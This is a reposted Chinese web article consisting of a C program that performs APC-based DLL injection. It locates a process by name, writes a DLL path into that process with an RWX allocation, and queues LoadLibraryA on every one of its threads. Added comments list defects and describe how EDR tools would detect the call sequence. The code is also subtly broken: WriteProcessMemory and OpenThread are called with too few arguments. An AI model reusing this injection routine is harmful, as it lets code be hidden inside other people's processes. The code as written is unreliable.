APC注入
发布时间:2020-12-14 01:37:46 所属栏目:Windows 来源:网络整理
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
/*
 * Look up a process id by executable file name using a Toolhelp snapshot.
 *
 * Walks every entry of a TH32CS_SNAPPROCESS snapshot and returns the
 * th32ProcessID of the first entry whose szExeFile matches pszProcessName
 * case-insensitively (strcmpi is the MSVC name for that comparison).
 *
 * Defects visible in this block, left as written:
 *  - the CreateToolhelp32Snapshot result is used without checking for
 *    INVALID_HANDLE_VALUE;
 *  - hSnap is never released with CloseHandle, on either the found or the
 *    not-found path (handle leak);
 *  - when no process matches, control falls off the end of a non-void
 *    function, which is undefined behaviour in C — the caller gets an
 *    unspecified value rather than a sentinel such as 0.
 */
DWORD GetProcessIdByName(char *pszProcessName) {
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    /* dwSize must be set before the first Process32First call. */
    PROCESSENTRY32 ProcesEntry = {sizeof(ProcesEntry)};
    BOOL bRet = Process32First(hSnap,&ProcesEntry);
    while (bRet) {
        if (strcmpi(ProcesEntry.szExeFile,pszProcessName) == 0) {
            /* Early return: hSnap leaks here. */
            return ProcesEntry.th32ProcessID;
        }
        bRet = Process32Next(hSnap,&ProcesEntry);
    }
    /* No return statement on the not-found path (see header comment). */
}
/*
 * Collect the ids of every thread owned by ProcessId into a heap array.
 *
 * On return *ppThreadId points to a malloc'd DWORD array — ownership passes
 * to the caller, who is responsible for free() — and *LengthThread holds
 * the number of ids written.
 *
 * Defects visible in this block, left as written:
 *  - declared BOOL but never returns a value (undefined behaviour for a
 *    caller that reads the result);
 *  - the malloc result is not checked; a NULL return is dereferenced on the
 *    first matching thread;
 *  - the array is a fixed 1024 entries and count is never bounded, so a
 *    process with more than 1024 threads produces a heap buffer overflow;
 *  - the snapshot handle hSnap is never released with CloseHandle;
 *  - count is an int but is stored into a DWORD (signed/unsigned mismatch).
 */
BOOL GetAllThreadId(DWORD ProcessId,DWORD **ppThreadId,DWORD *LengthThread){
    /* TH32CS_SNAPTHREAD enumerates threads of all processes; filtered below. */
    HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);
    THREADENTRY32 ThreadEntry={sizeof(ThreadEntry)};
    BOOL bRet=Thread32First(hSnap,&ThreadEntry);
    /* Fixed-capacity buffer; no bounds check on count (see header comment). */
    DWORD *pThreadId =malloc(sizeof(DWORD)*1024);
    int count=0;
    while(bRet){
        if(ThreadEntry.th32OwnerProcessID==ProcessId){
            pThreadId[count]=ThreadEntry.th32ThreadID;
            count++;
        }
        bRet=Thread32Next(hSnap,&ThreadEntry);
    }
    *ppThreadId=pThreadId;
    *LengthThread=count;
    /* No return statement; hSnap is not closed. */
}
/*
 * Queues LoadLibraryA as a user-mode APC on every thread of the target
 * process, passing a remote copy of the DLL path as the argument — the
 * "APC injection" technique the article describes.
 *
 * Detection notes (defender's view): the call sequence is characteristic
 * and visible to EDR / ETW telemetry — OpenProcess with PROCESS_ALL_ACCESS,
 * VirtualAllocEx of a PAGE_EXECUTE_READWRITE region in another process,
 * WriteProcessMemory into it, then OpenThread + QueueUserAPC against
 * threads the caller does not own. A cross-process QueueUserAPC whose
 * routine resolves to kernel32!LoadLibraryA is a high-signal indicator, and
 * an RWX allocation in a foreign process rarely has a benign explanation.
 * Per the documented QueueUserAPC semantics the APC runs only when the
 * target thread next enters an alertable wait, which is why every thread of
 * the process is targeted rather than one.
 *
 * Resource and error handling as written: the results of GetProcessIdByName,
 * OpenProcess, VirtualAllocEx, GetProcAddress and OpenThread are used
 * unchecked; hProcess and each hThread are never closed; the remote
 * allocation is never freed; the pThreadId array handed out by
 * GetAllThreadId is never free()d; LengthThread is DWORD but compared
 * against a signed int loop index; and the function is declared BOOL yet
 * never returns a value.
 */
BOOL DllInject(char *pszProcessName,char *pszDllName){
    DWORD ProcessId=GetProcessIdByName(pszProcessName);
    DWORD *pThreadId=NULL;
    DWORD LengthThread=0;
    GetAllThreadId(ProcessId,&pThreadId,&LengthThread);
    /* Full-access handle to a foreign process: an audit-worthy event on its own. */
    HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProcessId);
    /* RWX is requested although the region only ever holds a string. */
    LPVOID lDllAdr=VirtualAllocEx(hProcess,NULL,strlen(pszDllName)+1,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess,lDllAdr,pszDllName,0);
    /* kernel32 is mapped at the same base in every process of a session,
       so the local address is reused for the remote APC routine. */
    FARPROC pLoadLibraryA=GetProcAddress(GetModuleHandleA("kernel32.dll"),"LoadLibraryA");
    HANDLE hThread;
    for(int i=0;i<LengthThread;i++){
        hThread=OpenThread(THREAD_ALL_ACCESS,pThreadId[i]);
        QueueUserAPC((PAPCFUNC)pLoadLibraryA,hThread,(ULONG_PTR) lDllAdr);
        /* hThread is overwritten on the next iteration without CloseHandle. */
    }
    /* No return statement despite the BOOL signature. */
}
/*
 * Entry point: injects the DLL at the hard-coded path into the named
 * process. The path literal appears here without path separators, which
 * presumably were lost when the article was extracted; it is reproduced
 * exactly as shown on the page because it is runtime data. The BOOL result
 * of DllInject is ignored.
 */
int main(){
    DllInject("code.exe","C:UsersbeiniDesktopworktest.dll");
    return 0;
}